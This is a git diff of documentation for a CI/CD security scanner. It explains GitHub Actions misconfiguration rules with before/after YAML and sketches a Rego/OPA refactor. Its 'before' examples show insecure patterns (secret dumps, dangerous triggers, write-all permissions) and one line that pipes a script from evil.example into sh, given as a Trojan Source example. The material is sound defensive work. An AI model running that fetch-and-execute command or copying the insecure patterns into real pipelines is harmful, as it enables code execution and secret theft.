+reads the reverse.
+
+```yaml
+# β before
+if: contains('main', github.ref)
+```
+
+```yaml
+# ✅ after — haystack first, needle second
+if: contains(github.ref, 'refs/heads/main')
+
+# ✅ explicit allow-list — clearest
+if: contains(fromJSON('["main", "release"]'), github.ref_name)
+```
+
+---
+
+## ISSUE-213 β `unsafe-github-context-dump`
+
+**Severity:** `high` β’ **Control:** `workflowMustNotExportEntireGitHubContext`
+
+A `run:` script, env binding or action input serialises the whole
+`github` context (or `github.event`) via `toJson(...)`. The
+resulting JSON carries every user-controllable field GitHub exposes
+β PR title, issue body, fork branch name, commit message β
+bundled together. A single `echo $JSON` downstream leaks the full
+attack surface, and passing the blob to a third-party action hands
+it the same surface as input.
+
+```yaml
+# β before β every github.event field ends up in PAYLOAD
+jobs:
+ report:
+ env:
+ PAYLOAD: ${{ toJson(github.event) }}
+ steps:
+ - run: echo "$PAYLOAD" > /tmp/event.json
+```
+
+```yaml
+# ✅ after — name the specific fields you need
+jobs:
+ report:
+ env:
+ PR_NUMBER: ${{ github.event.pull_request.number }}
+ PR_AUTHOR: ${{ github.event.pull_request.user.login }}
+ steps:
+ - run: jq -n --arg n "$PR_NUMBER" --arg a "$PR_AUTHOR" '{number:$n,author:$a}' > /tmp/event.json
+```
+
+Same risk class as ISSUE-206 template-injection, but the dump form
+is worse: one line leaks the whole field set rather than one
+field.
+
+---
+
+## ISSUE-214 β `unpinned-package-install`
+
+**Severity:** `medium` β’ **Control:** `workflowMustPinPackageInstalls`
+
+A `run:` step invokes `pip install PKG` or `npm install PKG`
+without pinning a version and without a lockfile install. Every
+run then resolves whatever is latest on the registry at execution
+time β a window exploited repeatedly by typosquat and maintainer-
+account compromise attacks.
+
+```yaml
+# β before
+- run: pip install requests
+- run: npm install react
+```
+
+```yaml
+# ✅ after — lockfile install + inline pin where needed
+- run: pip install -r requirements.txt
+- run: npm ci
+- run: pip install 'pytest==8.3.3'
+- run: npm install react@18.3.1
+```
+
+Lockfile-based installs (`npm ci`, `pip install -r requirements.txt --require-hashes`)
+combine with Dependabot to keep runs reproducible AND fresh.
+
+---
+
+## ISSUE-215 β `template-injection-vars`
+
+**Severity:** `low` β’ **Control:** `workflowMustNotInjectVarsInScripts`
+
+Same shape as ISSUE-206 template-injection but sourced from
+maintainer-adjacent values rather than PR-author input. Two kinds
+are flagged:
+
+- `${{ vars.* }}` β repo / org / environment variables set by
+ maintainers. Exploitable on a compromised maintainer account or a
+ misconfigured org-level variable.
+- `${{ inputs.* }}` β inputs to a reusable workflow. When the
+ caller proxies `github.event.*` into an input, the surface flips
+ to PR-author-controlled.
+
+```yaml
+# β before
+- run: docker login ${{ vars.REGISTRY }} -u admin -p ${{ secrets.TOKEN }}
+```
+
+```yaml
+# ✅ after — env binding quotes the value automatically
+- env:
+ REGISTRY: ${{ vars.REGISTRY }}
+ TOKEN: ${{ secrets.TOKEN }}
+ run: docker login "$REGISTRY" -u admin -p "$TOKEN"
+```
+
+```yaml
+# β before β reusable workflow input pasted into a shell
+- run: make ${{ inputs.test-command }}
+
+# ✅ after — binding via env:
+- env:
+ TEST_CMD: ${{ inputs.test-command }}
+ run: make "$TEST_CMD"
+```
+
+---
+
+## ISSUE-301 β `overprovisioned-secrets`
+
+**Severity:** `critical` β’ **Control:** `workflowMustNotExportEntireSecretsContext`
+
+`toJson(secrets)` or `toJSON(secrets)` serialises the entire secrets
+context into a string and passes it to a step's script, env binding,
+or action `with:` input. Every downstream consumer (log, third-party
+action, HTTP header) sees the full stock.
+
+```yaml
+# β before β every secret ends up in SECRETS_JSON
+jobs:
+ call:
+ env:
+ SECRETS_JSON: ${{ toJson(secrets) }}
+ steps:
+ - run: echo "$SECRETS_JSON" | ./upload
+```
+
+```yaml
+# ✅ after — one env binding per secret
+jobs:
+ call:
+ steps:
+ - env:
+ API_TOKEN: ${{ secrets.API_TOKEN }}
+ run: ./upload
+```
+
+---
+
+## ISSUE-302 β `secrets-inherit`
+
+**Severity:** `high` β’ **Control:** `reusableWorkflowsMustNotInheritSecrets`
+
+A reusable-workflow call with `secrets: inherit` forwards every secret
+visible to the caller. A compromise of the callee β upstream account,
+malicious PR merged on the reusable side, tag retag β then sees the
+full secret surface of every caller.
+
+```yaml
+# β before
+jobs:
+ call:
+ uses: org/shared/.github/workflows/publish.yml@v1
+ secrets: inherit
+```
+
+```yaml
+# ✅ after — explicit per-secret mapping
+jobs:
+ call:
+ uses: org/shared/.github/workflows/publish.yml@v1
+ secrets:
+ NPM_TOKEN: ${{ secrets.NPM_TOKEN }}
+```
+
+---
+
+## ISSUE-303 β `unredacted-secrets`
+
+**Severity:** `high` β’ **Control:** `workflowMustNotUnredactSecretsViaFromJSON`
+
+`fromJSON(secrets.X).y` defeats GitHub's automatic log redaction.
+Redaction works on the known-secret value; once `fromJSON` parses the
+blob, the sub-fields are fresh strings the runtime never saw, so any
+later echo leaks them in plain text.
+
+```yaml
+# β before β .token bypasses redaction once fromJSON runs
+jobs:
+ deploy:
+ env:
+ API_TOKEN: ${{ fromJSON(secrets.CREDS).token }}
+ steps:
+ - run: echo "token=$API_TOKEN" >> deploy.log
+```
+
+```yaml
+# ✅ after — split the structured secret, store each leaf separately
+jobs:
+ deploy:
+ env:
+ API_TOKEN: ${{ secrets.API_TOKEN }}
+ steps:
+ - run: echo "token=$API_TOKEN" >> deploy.log
+```
+
+---
+
+## ISSUE-304 β `undocumented-permissions`
+
+**Severity:** `medium` β’ **Control:** `workflowsMustDeclarePermissions`
+
+Neither the workflow nor any job declares a `permissions:` block. The
+runner inherits the repository-wide default GITHUB_TOKEN scope β
+often `contents: write` or `read-all`. Every step gets more authority
+than it needs; any compromise escalates with that larger scope.
+
+```yaml
+# β before β inherits the repo default
+name: Build
+on: [push]
+jobs:
+ build:
+ runs-on: ubuntu-latest
+ steps:
+ - run: make build
+```
+
+```yaml
+# ✅ after — least-privilege declaration
+name: Build
+on: [push]
+permissions:
+ contents: read
+jobs:
+ build:
+ runs-on: ubuntu-latest
+ steps:
+ - run: make build
+```
+
+---
+
+## ISSUE-305 β `secrets-outside-env`
+
+**Severity:** `medium` β’ **Control:** `deployJobsMustUseEnvironmentGate`
+
+A deploy / publish job (trigger `release` or a canonical publish
+action) reads secrets without an `environment:` gate. Environments are
+the GitHub hook for required reviewers, wait timers, and deployment
+branch rules β without one, the trigger leads straight to the secret.
+
+```yaml
+# ❌ before — no environment, no reviewer in the loop
+name: Publish
+on: [release]
+jobs:
+ publish:
+ runs-on: ubuntu-latest
+ steps:
+ - run: twine upload --password ${{ secrets.PYPI_TOKEN }} dist/*
+```
+
+```yaml
+# ✅ after — environment: production with reviewers configured on it
+name: Publish
+on: [release]
+jobs:
+ publish:
+ runs-on: ubuntu-latest
+ environment: production
+ steps:
+ - run: twine upload --password ${{ secrets.PYPI_TOKEN }} dist/*
+```
+
+---
+
+## ISSUE-306 β `github-app-skip-revoke`
+
+**Severity:** `high` β’ **Control:** `githubAppTokensMustBeRevokedOnExit`
+
+A step mints a GitHub App installation token with
+`skip-token-revoke: true`. The token survives the run and becomes a
+long-lived credential β any later leak (log, artefact, restored cache)
+stays exploitable instead of meeting a revoked token.
+
+```yaml
+# ❌ before
+- uses: actions/create-github-app-token@v1
+ id: app-token
+ with:
+ app-id: ${{ vars.APP_ID }}
+ private-key: ${{ secrets.APP_PRIVATE_KEY }}
+ skip-token-revoke: true
+```
+
+```yaml
+# ✅ after — default behaviour revokes on exit
+- uses: actions/create-github-app-token@v1
+ id: app-token
+ with:
+ app-id: ${{ vars.APP_ID }}
+ private-key: ${{ secrets.APP_PRIVATE_KEY }}
+```
+
+---
+
+## ISSUE-307 β `artipacked`
+
+**Severity:** `high` β’ **Control:** `checkoutMustNotPersistCredentials`
+
+`actions/checkout` writes the GITHUB_TOKEN into the cloned repo's
+`.git/config` by default. Any later step that uploads `.git` as part
+of an artefact, or that runs fork-controlled code, can exfiltrate the
+token.
+
+```yaml
+# ❌ before — token persisted
+- uses: actions/checkout@v4
+```
+
+```yaml
+# ✅ after — disable credential persistence
+- uses: actions/checkout@v4
+ with:
+ persist-credentials: false
+```
+
+---
+
+## ISSUE-308 β `secrets-dynamic-index`
+
+**Severity:** `low` β’ **Control:** `workflowMustNotIndexSecretsDynamically`
+
+A workflow reads `${{ secrets[expr] }}` where `expr` is not a
+quoted literal β typically an `env.VAR_NAME`, `inputs.*`,
+`matrix.*`, or a computed expression. The bracket form defers the
+secret name resolution to runtime, which effectively hands read
+access to every secret the job can see to whatever drives `expr`.
+A later refactor that threads a template expression through the
+index silently promotes the weakness.
+
+```yaml
+# ❌ before — which secret is read depends on an env binding
+jobs:
+ e2e:
+ env:
+ OSC_ACCESS_KEY_NAME: PROD_AK
+ steps:
+ - env:
+ OSC_ACCESS_KEY: ${{ secrets[env.OSC_ACCESS_KEY_NAME] }}
+ run: ./run-e2e.sh
+```
+
+```yaml
+# ✅ after — secret named directly, grant surface explicit
+jobs:
+ e2e:
+ steps:
+ - env:
+ OSC_ACCESS_KEY: ${{ secrets.PROD_AK }}
+ run: ./run-e2e.sh
+```
+
+When a matrix genuinely needs to choose among N secrets, split the
+job into N jobs with static names β the verbosity is worth the
+reviewability.
+
+---
+
+## ISSUE-414 β `dangerous-triggers`
+
+**Severity:** `critical` β’ **Control:** `workflowMustNotUseDangerousTriggers`
+
+The workflow subscribes to `pull_request_target` or `workflow_run`.
+Both run with the base repository's secrets AND are influenceable by
+an unprivileged caller. Combined with any form of user-content checkout
+or template injection, this becomes a direct secret-exfiltration path β
+the pattern behind the March 2025 tj-actions compromise (CVE-2025-30066).
+
+```yaml
+# ❌ before
+name: PR preview
+on:
+ pull_request_target:
+ types: [opened, synchronize]
+```
+
+```yaml
+# ✅ after — standard pull_request runs in the fork's context
+name: PR preview
+on:
+ pull_request:
+ types: [opened, synchronize]
+```
+
+---
+
+## ISSUE-415 β `pull-request-target-with-head-checkout`
+
+**Severity:** `critical` β’ **Control:** `pullRequestTargetMustNotCheckoutHead`
+
+`pull_request_target` AND an explicit checkout of the PR head
+(`github.event.pull_request.head.sha`, `github.head_ref`). Base-repo
+secrets plus fork-controlled code in the same run: the exact vector
+of CVE-2025-30066.
+
+```yaml
+# ❌ before — the literal tj-actions pattern
+name: Preview
+on: [pull_request_target]
+jobs:
+ preview:
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v4
+ with:
+ ref: ${{ github.event.pull_request.head.sha }}
+ - run: npm install && npm test
+```
+
+```yaml
+# ✅ after — split trigger: metadata under pull_request_target,
+# fork code under a plain pull_request handoff
+name: Preview β metadata
+on: [pull_request_target]
+permissions:
+ pull-requests: write
+jobs:
+ label:
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v4 # base repo, no ref: override
+ - run: gh pr edit --add-label auto-preview
+```
+
+---
+
+## ISSUE-509 β `excessive-permissions`
+
+**Severity:** `high` β’ **Control:** `workflowMustNotGrantPermissionsWriteAll`
+
+`permissions: write-all` grants the GITHUB_TOKEN write access to every
+API scope. Any compromise (unpinned action, injection, cache poisoning)
+then escalates to full repository control.
+
+```yaml
+# ❌ before — blanket write-all
+permissions: write-all
+jobs:
+ build:
+ runs-on: ubuntu-latest
+ steps: [ { run: make build } ]
+```
+
+```yaml
+# ✅ after — narrowest scope, widened per job when needed
+permissions:
+ contents: read
+jobs:
+ comment-pr:
+ runs-on: ubuntu-latest
+ permissions:
+ pull-requests: write # only the job that needs it
+ steps: [ { run: gh pr comment ... } ]
+```
+
+---
+
+## ISSUE-601 β `anonymous-definition`
+
+**Severity:** `low` β’ **Control:** `workflowsMustHaveExplicitName`
+
+No top-level `name:`. GitHub falls back to the file path in the Actions
+UI, PR checks, required-status-check rules and the audit log. A rename
+silently breaks the required-status-check binding that referenced the
+old path.
+
+```yaml
+# ❌ before
+on: [push]
+jobs:
+ build:
+ runs-on: ubuntu-latest
+ steps: [ { run: make build } ]
+```
+
+```yaml
+# ✅ after — stable identifier
+name: Build and Test
+on: [push]
+jobs:
+ build:
+ runs-on: ubuntu-latest
+ steps: [ { run: make build } ]
+```
+
+---
+
+## ISSUE-602 β `missing-concurrency`
+
+**Severity:** `medium` β’ **Control:** `workflowsMustDeclareConcurrency`
+
+No `concurrency:` block at either workflow or job level. Concurrent
+triggers on the same ref (rebases, force-pushes, retries) race on
+caches, artefacts, deploy targets. On a deploy workflow an older run
+can even overtake a newer one and land stale output.
+
+```yaml
+# ❌ before
+name: Deploy
+on: [push]
+jobs:
+ deploy:
+ runs-on: ubuntu-latest
+ steps:
+ - run: ./deploy.sh
+```
+
+```yaml
+# ✅ after — concurrency group scoped by workflow+ref
+name: Deploy
+on: [push]
+concurrency:
+ group: ${{ github.workflow }}-${{ github.ref }}
+ cancel-in-progress: true # set false for production deploys
+jobs:
+ deploy:
+ runs-on: ubuntu-latest
+ steps:
+ - run: ./deploy.sh
+```
+
+---
+
+## ISSUE-603 β `workflow-misfeature`
+
+**Severity:** `medium` β’ **Control:** `workflowMustNotUseKnownMisfeatures`
+
+`actions/upload-artifact` with `path: .` or
+`path: ${{ github.workspace }}` uploads the whole checkout β including
+`.git/`. Paired with ISSUE-307 (artipacked) this exfiltrates the
+GITHUB_TOKEN; even alone it leaks the full git history.
+
+```yaml
+# ❌ before
+- uses: actions/upload-artifact@v4
+ with:
+ name: workspace
+ path: .
+```
+
+```yaml
+# ✅ after — upload the build output, nothing else
+- uses: actions/upload-artifact@v4
+ with:
+ name: binaries
+ path: dist/
+```
+
+---
+
+## ISSUE-604 β `workflow-obfuscation`
+
+**Severity:** `high` β’ **Control:** `workflowMustNotContainObfuscation`
+
+The workflow carries invisible Unicode (zero-width spaces U+200BβU+200F,
+bidi overrides U+202AβU+202E, BOM U+FEFF) inside a script, env value or
+action input. The source looks harmless in review while the runner
+executes a different instruction. This is the **Trojan Source**
+attack class (CVE-2021-42574), documented against npm / PyPI packages
+since 2021.
+
+```yaml
+# ❌ before — zero-width space between "curl" and the URL
+# (not visible, but the runner sees it)
+- run: curlβhttps://evil.example/payload.sh | sh
+```
+
+```yaml
+# ✅ after — pure ASCII, pinned fetch, verified checksum
+- run: |
+ curl -fsSL -o /tmp/payload.sh https://trusted.example/payload.sh
+  echo "<expected-sha256>  /tmp/payload.sh" | sha256sum -c -
+ bash /tmp/payload.sh
+```
+
+A pre-commit hook refusing zero-width / bidi Unicode in source files is
+the sustainable fix.
+
+---
+
+## ISSUE-605 β `use-trusted-publishing`
+
+**Severity:** `high` β’ **Control:** `publishWorkflowsMustUseOidcTrustedPublishing`
+
+Publish to PyPI / npm / Maven Central uses a long-lived static token
+instead of OIDC trusted publishing. Static tokens are reusable from
+anywhere they leak; OIDC tokens are short-lived, scoped to a specific
+repo / workflow / environment.
+
+```yaml
+# ❌ before — static token
+jobs:
+ publish:
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v4
+ - run: python -m build
+ - uses: pypa/gh-action-pypi-publish@v1
+ with:
+ password: ${{ secrets.PYPI_API_TOKEN }}
+```
+
+```yaml
+# ✅ after — OIDC, no password: input
+jobs:
+ publish:
+ runs-on: ubuntu-latest
+ permissions:
+ id-token: write # required for OIDC
+ contents: read
+ steps:
+ - uses: actions/checkout@v4
+ - run: python -m build
+ - uses: pypa/gh-action-pypi-publish@v1
+```
+
+Configure the matching *trusted publisher* on PyPI project settings
+(for npm, use `--provenance`; for Maven Central, the Sonatype portal's
+trusted publishing flow).
+
+---
+
+## ISSUE-606 β `dependabot-insecure-exec`
+
+**Severity:** `critical` β’ **Control:** `dependabotMustNotAllowInsecureExternalCodeExecution`
+
+`.github/dependabot.yml` sets `insecure-external-code-execution: allow`
+for an ecosystem. Dependabot then runs install / postinstall hooks
+from every candidate version during resolution, giving any compromised
+upstream package direct code execution inside the privileged Dependabot
+runner.
+
+```yaml
+# ❌ before
+version: 2
+updates:
+ - package-ecosystem: npm
+ directory: /
+ schedule: { interval: daily }
+ insecure-external-code-execution: allow
+```
+
+```yaml
+# ✅ after — default (deny) is the correct value
+version: 2
+updates:
+ - package-ecosystem: npm
+ directory: /
+ schedule: { interval: daily }
+```
+
+---
+
+## ISSUE-607 β `dependabot-missing-cooldown`
+
+**Severity:** `low` β’ **Control:** `dependabotEcosystemsMustHaveCooldown`
+
+An ecosystem in `.github/dependabot.yml` has no `cooldown:` window.
+Dependabot then opens a PR the instant a new upstream version is
+published β including the minute-old release a compromised maintainer
+just pushed. The security-advisory pipeline needs 24β72 h to flag a
+bad release; a cooldown buys that window.
+
+```yaml
+# ❌ before
+version: 2
+updates:
+ - package-ecosystem: npm
+ directory: /
+ schedule: { interval: daily }
+```
+
+```yaml
+# ✅ after — 3-day default, 7-day window for major bumps
+version: 2
+updates:
+ - package-ecosystem: npm
+ directory: /
+ schedule: { interval: daily }
+ cooldown:
+ default-days: 3
+ semver-major-days: 7
+ include: ["*"]
+```
+
+---
+
+## ISSUE-608 β `dependency-update-tool-missing`
+
+**Severity:** `medium` β’ **Control:** `repositoriesMustConfigureDependencyUpdates`
+
+The repository ships CI/CD workflows but has neither
+`.github/dependabot.yml` nor a Renovate config. Dependency pins β
+third-party action SHAs, container image digests, lockfiles β then
+drift as upstream patches land; every unpatched CVE stays until a
+human remembers to refresh them.
+
+Fix for Dependabot (`.github/dependabot.yml`):
+
+```yaml
+version: 2
+updates:
+ - package-ecosystem: github-actions
+ directory: /
+ schedule: { interval: weekly }
+ cooldown: { default-days: 3, semver-major-days: 7 }
+ - package-ecosystem: npm # or pip / gomod / cargo / β¦
+ directory: /
+ schedule: { interval: weekly }
+```
+
+Alternative: a minimal `renovate.json` at the repo root:
+
+```json
+{
+ "$schema": "https://docs.renovatebot.com/renovate-schema.json",
+ "extends": ["config:recommended"],
+ "pinDigests": true
+}
+```
+
+Either one satisfies the rule.
+
+---
+
+## ISSUE-609 β `sast-workflow-missing`
+
+**Severity:** `low` β’ **Control:** `repositoriesMustRunSAST`
+
+None of the repository's workflows invokes a recognised SAST
+scanner (CodeQL, Semgrep, SonarQube, Trivy config scan, Snyk,
+FOSSA, Bearer, DevSkim, gitleaks, β¦). Static analysis catches
+whole vulnerability classes β injection, unsafe deserialisation,
+crypto misuse β before they reach production; leaving it out of
+CI means the only gate is manual review, which misses regressions
+exactly when the diff is large.
+
+Drop a CodeQL workflow (free for public repos) under
+`.github/workflows/codeql.yml`:
+
+```yaml
+name: CodeQL
+on:
+ push: { branches: [main] }
+ pull_request: { branches: [main] }
+
+permissions:
+ contents: read
+ security-events: write
+
+jobs:
+ analyze:
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v4
+ - uses: github/codeql-action/init@v3
+ with: { languages: go } # or javascript / python / β¦
+ - uses: github/codeql-action/analyze@v3
+```
+
+Semgrep, SonarCloud, Trivy config-scan, Snyk, Bearer all qualify.
+The list is kept broad so the rule does not force a specific
+vendor.
+
+---
+
+## ISSUE-610 β `security-policy-missing`
+
+**Severity:** `low` β’ **Control:** `repositoriesMustPublishSecurityPolicy`
+
+The repository has no `SECURITY.md` (nor `.github/SECURITY.md`,
+nor `docs/SECURITY.md`) documenting the vulnerability disclosure
+process. Researchers who find an issue have no public contact
+beyond opening a GitHub issue β which defeats coordinated
+disclosure and trains them to dump vulnerabilities in the open.
+
+A two-paragraph `SECURITY.md` at the root is enough:
+
+```markdown
+# Security Policy
+
+## Supported versions
+
+The latest minor release and the previous one receive security
+patches. Older releases do not.
+
+## Reporting a vulnerability
+
+Send a private report via GitHub's **Security β Report a
+vulnerability** flow, or email security@example.com. We
+acknowledge within 48 hours and aim for a fix (or a coordinated
+disclosure plan) within 14 days.
+```
+
+GitHub picks up any of the three canonical locations and links
+the policy from the repo landing page and the "Security" tab.
+
+---
+
+## Appendix
+
+### Exit codes
+
+| Code | Meaning |
+| :--- | :--- |
+| `0` | No finding above the threshold |
+| `1` | At least one finding / compliance below threshold |
+| `2` | Runtime error (bad config, missing auth, collector failure) |
+
+### `.plumber.yaml` control names
+
+Each rule's `ControlName` (used with `--controls` / `--skip-controls`
+and in `.plumber.yaml`) is declared in
+[`control/codes.go`](../control/codes.go). A few shortcuts:
+
+| Code | ControlName |
+| :--- | :--- |
+| ISSUE-102 / 103 | `containerImageMustNotUseForbiddenTags` |
+| ISSUE-104 | `actionsMustBePinnedByCommitSha` |
+| ISSUE-107 | `dockerfilesMustPinBaseImageByDigest` |
+| ISSUE-112 | `releaseWorkflowsMustSignArtefacts` |
+| ISSUE-113 | `actionRefsMustNotCollide` |
+| ISSUE-114 | `actionsMustNotCarryKnownCVEs` |
+| ISSUE-115 | `actionsMustNotDuplicateRunnerBuiltins` |
+| ISSUE-213 | `workflowMustNotExportEntireGitHubContext` |
+| ISSUE-214 | `workflowMustPinPackageInstalls` |
+| ISSUE-215 | `workflowMustNotInjectVarsInScripts` |
+| ISSUE-308 | `workflowMustNotIndexSecretsDynamically` |
+| ISSUE-414 / 415 | `workflowMustNotUseDangerousTriggers`, `pullRequestTargetMustNotCheckoutHead` |
+| ISSUE-607 | `dependabotEcosystemsMustHaveCooldown` |
+| ISSUE-608 | `repositoriesMustConfigureDependencyUpdates` |
+| ISSUE-609 | `repositoriesMustRunSAST` |
+| ISSUE-610 | `repositoriesMustPublishSecurityPolicy` |
+
+### API-backed rules
+
+ISSUE-108 / 109 / 110 / 111 / 113 / 114 call the GitHub REST API
+via `github.com/cli/go-gh`, which reuses the locally stored `gh`
+token. Without `gh auth login`, those rules degrade silently (no
+false positives) rather than failing the run.
+
+Disable them explicitly in sealed CI environments with:
+
+```bash
+export PLUMBER_DISABLE_GITHUB_API=1
+```
+
+### JSON output schema
+
+```bash
+plumber analyze --print=false --output findings.json
+```
+
+```json
+{
+ "projectPath": "owner/repo",
+ "ciValid": true,
+ "findings": [
+ {
+ "code": "ISSUE-414",
+ "severity": "critical",
+ "message": "job \"preview\" is reachable via the dangerous trigger \"pull_request_target\"",
+ "job": "pr-preview/preview",
+ "file": ".github/workflows/pr-preview.yml",
+ "line": 13
+ }
+ ]
+}
+```
diff --git a/docs/PBOM.md b/docs/PBOM.md
index 8bc6d57..baa6e0a 100644
--- a/docs/PBOM.md
+++ b/docs/PBOM.md
@@ -74,15 +74,17 @@ The native Plumber PBOM format provides a detailed, pipeline-specific inventory
### Structure
+Top-level keys are emitted in this order (human-readable flow: context → aggregates → score → inventories):
+
```json
{
"pbomVersion": "1.0.0",
"generatedAt": "2026-02-09T15:26:20Z",
"project": { ... },
- "containerImages": [ ... ],
- "includes": [ ... ],
"summary": { ... },
- "plumberScore": { ... }
+ "plumberScore": { ... },
+ "containerImages": [ ... ],
+ "includes": [ ... ]
}
```
@@ -93,10 +95,10 @@ The native Plumber PBOM format provides a detailed, pipeline-specific inventory
| `pbomVersion` | string | PBOM specification version (currently `"1.0.0"`) |
| `generatedAt` | string | ISO 8601 timestamp of generation |
| `project` | object | Information about the analyzed project |
-| `containerImages` | array | All container images used in the pipeline |
-| `includes` | array | All includes (components, templates, local, remote, project) |
| `summary` | object | Aggregate statistics |
| `plumberScore` | object | Optional. Present when `plumber analyze` is run with `--score` and/or `--score-point`. Letter score (AβE), points (0β100), and severity counts (see below). |
+| `containerImages` | array | All container images used in the pipeline |
+| `includes` | array | All includes (components, templates, local, remote, project) |
### `project` Object
@@ -151,14 +153,14 @@ Each entry represents a CI/CD include dependency. Fields vary by include type: o
| `fromCatalog` | bool | Whether it comes from the GitLab CI/CD Catalog. Only for `component` type. |
| `nested` | bool | Whether this is a nested include (included by another include). Only present when `true`. |
| `overridden` | bool | Whether this include's jobs are overridden with forbidden CI/CD keywords. Only present when `true`. |
-| `overriddenJobs` | array | Details of which jobs are overridden and with which keywords. Only present when `overridden` is `true`. |
+| `overriddenJobs` | array | Details of which jobs are overridden and with which keywords. Only present when `overridden` is `true`. JSON uses camelCase (`overriddenJobs`, `overriddenKeys`), not snake_case. |
Each entry in `overriddenJobs[]`:
| Field | Type | Description |
|-------|------|-------------|
| `jobName` | string | Name of the overridden job |
-| `overriddenKeys` | string[] | Forbidden CI/CD keywords found in the override (e.g., `script`, `image`, `rules`) |
+| `overriddenKeys` | string[] | CI/CD job keys redefined locally on top of the upstream include (the same βforbidden overrideβ keywords Plumber uses for compliance, e.g., `script`, `image`, `rules`) |
**Example (component):**
@@ -259,8 +261,8 @@ When `plumber analyze` is run with `--score` and/or `--score-point`, the BOM inc
{
"bomFormat": "CycloneDX",
"specVersion": "1.5",
- "serialNumber": "urn:uuid:...",
"version": 1,
+ "serialNumber": "urn:uuid:...",
"metadata": { ... },
"components": [ ... ]
}
@@ -272,8 +274,8 @@ When `plumber analyze` is run with `--score` and/or `--score-point`, the BOM inc
|-------|------|-------------|
| `bomFormat` | string | Always `"CycloneDX"` |
| `specVersion` | string | CycloneDX spec version (`"1.5"`) |
-| `serialNumber` | string | Unique BOM identifier (URN UUID) |
| `version` | number | BOM version (always `1`) |
+| `serialNumber` | string | Unique BOM identifier (URN UUID) |
| `metadata` | object | BOM metadata (timestamp, tool, subject) |
| `components` | array | All pipeline components |
diff --git a/docs/REFACTOR_MULTI_PROVIDER.md b/docs/REFACTOR_MULTI_PROVIDER.md
new file mode 100644
index 0000000..8fb72db
--- /dev/null
+++ b/docs/REFACTOR_MULTI_PROVIDER.md
@@ -0,0 +1,394 @@
+# Multi-Provider Refactor β Rego/OPA Rule Engine
+
+> **Status:** Phases 0, 1, 2 and 4 complete (2026-04-23). Multi-provider plumbing validated: the same `image_mutable_tag` Rego policy runs unchanged against both the GitLab lab (solution/lab-12) and the GitHub lab (plumber-tests/lab-github-cicd). Next up: Phase 5 (more provider-specific rules).
+> **Owner:** StΓ©phane Robert
+> **Last updated:** 2026-04-23
+
This document is the working reference for the ongoing refactor of Plumber
+from a GitLab-only, Go-hardcoded rule engine toward a **multi-provider scanner
+driven by Rego/OPA policies**. It is meant to be read by contributors (human
+or AI) continuing the work across sessions.
+
+---
+
+## 1. Goals
+
+1. **Support multiple CI/CD providers**: GitLab (current), GitHub Actions,
+ and β later β Azure DevOps, Gitea, Bitbucket Pipelines.
+2. **Replace the hardcoded Go control engine** with a Rego/OPA-based engine
+ where each rule is a declarative policy file.
+3. **Keep rules portable across providers** where the concept applies
+ (mutable image tags, weakened security jobs, debug trace, DinDβ¦).
+4. **Let users add their own rules** without recompiling Plumber.
+5. **Preserve the current UX**: same CLI, same JSON output shape (or a
+ documented, versioned migration path).
+
+## 2. Non-goals
+
+- Replacing OPA with a home-grown DSL. OPA/Rego is a deliberate choice for
+ ecosystem reasons (Conftest, Styra, tooling, learnability).
+- Rewriting the GitLab API collector. It stays; only the rule-evaluation
+ layer is rewritten.
+- Scanning arbitrary YAML or Terraform. Scope stays on CI/CD pipelines.
+
+## 3. Current architecture (as-is)
+
+```text
+cmd/analyze.go
+ β
+ βΌ
+collector/* β fetches & parses GitLab CI (API + local YAML)
+ β
+ βΌ
+control/controlGitlab*.go β ~15 hardcoded Go controls, each with typed result
+ β
+ βΌ
+AnalysisResult (control/types.go)
+```
+
+Pain points:
+
+- Each rule = one Go file + its own result type + its own test suite.
+- Every new rule requires a new release.
+- No way for a user to contribute a rule without touching Go code.
+- Multi-provider would currently mean duplicating all rules per provider.
+
+## 4. Target architecture (to-be)
+
+```text
+ ββββββββββββββββββββββββββββββββββββββββ
+ cmd/analyze β β Provider collectors (loaders) β
+ β - gitlab/ (existing, adapted) β
+ β - github/ (new) β
+ β - azure/ (later) β
+ ββββββββββββββββββββ¬ββββββββββββββββββββ
+ β produces
+ βΌ
+ ββββββββββββββββββββββββββββββββββββββββ
+ β Normalized IR (internal/ir) β
+ β NormalizedPipeline { β
+ β Provider, Jobs[]{ β
+ β Image, Script[], Services[], β
+ β AllowFailure, When, Rules, β¦ β
+ β }, β
+ β Includes[], Branches[], β¦ β
+ β } β
+ ββββββββββββββββββββ¬ββββββββββββββββββββ
+ β evaluated by
+ βΌ
+ ββββββββββββββββββββββββββββββββββββββββ
+ β OPA engine (internal/engine/opa) β
+ β - embeds built-in policies β
+ β - loads user policies from path β
+ β - namespaces: data.plumber.{rule} β
+ ββββββββββββββββββββ¬ββββββββββββββββββββ
+ β emits
+ βΌ
+ ββββββββββββββββββββββββββββββββββββββββ
+ β Findings[] β existing reporter β
+ β (PBOM, JSON, terminal, MR comment) β
+ ββββββββββββββββββββββββββββββββββββββββ
+```
+
+Key properties:
+
+- **Collectors** are provider-specific and do all I/O (API calls, YAML
+ parsing, include resolution, version lookups). They emit the IR.
+- **IR** is the single input format for all policies.
+- **Policies** are `.rego` files grouped by concern, not by provider.
+ A policy like `image_mutable_tag.rego` runs against any IR regardless of
+ origin.
+- **Engine** wraps OPA, handles policy discovery (embedded + user dir),
+ catalog of rule metadata (severity, code, remediation link).
+
+## 5. Normalized IR β first sketch
+
+```go
+// internal/ir/pipeline.go (to be created)
+
+type Provider string
+
+const (
+ ProviderGitLab Provider = "gitlab"
+ ProviderGitHub Provider = "github"
+)
+
+type NormalizedPipeline struct {
+ Provider Provider
+ ProjectPath string
+ DefaultBranch string
+ Jobs []Job
+ Includes []Include
+ Branches []Branch
+ Raw map[string]any // provider-specific escape hatch
+}
+
+type Job struct {
+ Name string
+ Image *Image
+ Services []Image
+ Scripts []string
+ AllowFailure bool
+ When string // "on_success", "manual", "never", β¦
+ Rules []Rule
+ Variables map[string]string
+ OriginFile string // file where the job is declared
+ OriginKind string // "local", "remote", "component", "template"β¦
+}
+
+type Image struct {
+ Name string
+ Tag string
+ Digest string // empty if not pinned
+}
+
+type Include struct {
+ Kind string // "local", "remote", "component", "template", "project"
+ Ref string // version/ref if applicable
+ Source string
+ Current string // fetched "latest" ref for freshness checks (nullable)
+}
+```
+
+The GitHub collector maps `jobs.<job_id>.runs-on`, `uses`, `with`, `container`
